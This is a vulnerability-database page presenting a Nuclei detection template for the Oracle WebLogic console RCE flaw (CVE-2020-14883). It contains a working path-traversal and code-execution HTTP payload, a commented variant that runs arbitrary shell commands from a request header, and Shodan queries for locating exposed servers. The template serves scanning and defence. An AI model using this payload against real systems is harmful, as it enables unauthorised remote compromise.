| Reporter | Title | Published | Views | Family All 37 |
|---|---|---|---|---|
| Exploit for CVE-2020-14882 | 28 Oct 202011:43 | – | githubexploit | |
| Exploit for CVE-2020-14883 | 25 Jan 202115:33 | – | githubexploit | |
| Exploit for CVE-2020-14883 | 11 Nov 202008:52 | – | githubexploit | |
| Exploit for CVE-2020-14883 | 9 Nov 202015:26 | – | githubexploit | |
| Exploit for CVE-2020-14882 | 10 Dec 202501:01 | – | githubexploit | |
| Oracle WebLogic Server Administration Console Handle Remote Code Execution Exploit | 19 Nov 202000:00 | – | zdt | |
| 2022 Top Routinely Exploited Vulnerabilities | 3 Aug 202312:00 | – | ics | |
| CVE-2020-14883 — Authenticated RCE in Console component of Oracle WebLogic Server | 21 Oct 202000:00 | – | attackerkb | |
| The vulnerability of the Console component of the Oracle WebLogic Server application server allows a attacker to gain full control over the application. | 13 Nov 202000:00 | – | bdu_fstec | |
| CVE-2020-14883 | 18 Nov 202021:46 | – | circl |
id: CVE-2020-14883
info:
name: Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution
author: pdteam,vicrack
severity: high
description: |
The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability.
reference:
- https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883
- https://www.oracle.com/security-alerts/cpuoct2020.html
- http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
- https://github.com/1n7erface/PocList
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2020-14883
epss-score: 0.97929
epss-percentile: 0.99902
cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: oracle
product: weblogic_server
shodan-query:
- title:"Oracle PeopleSoft Sign-in"
- product:"oracle weblogic"
- http.title:"oracle peoplesoft sign-in"
fofa-query: title="oracle peoplesoft sign-in"
google-query: intitle:"oracle peoplesoft sign-in"
tags: cve,cve2020,oracle,rce,weblogic,kev,packetstorm,vkev,vuln
variables:
str: "{{randstr}}"
revstr: "{{reverse(str)}}"
http:
- raw:
# CMD: String cmd = req.getHeader("CMD");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next();
- |
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String result = new StringBuilder("{{str}}").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')
matchers-condition: and
matchers:
- type: word
part: header
words:
- "ADMINCONSOLESESSION"
- type: word
part: body
words:
- "{{revstr}}"
- type: status
status:
- 200
# digest: 4a0a0047304502200955ba3a9778813af8363a9b81668a4788da45ff68fb068f77366572ed95e433022100b81dbedb53804533520c8f17bdf08a220bd972fa5c3c7a0681f690114f7e4d79:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation